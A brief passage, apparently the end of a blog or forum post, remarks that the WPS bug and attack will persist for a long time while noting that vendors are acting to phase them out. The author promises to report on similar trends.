The WPS bug and attack are not going anywhere for a long time but it's interesting to see the proactive actions of vendors hoping for an eventual extinction.  I will keep you posted if I see any similar trends.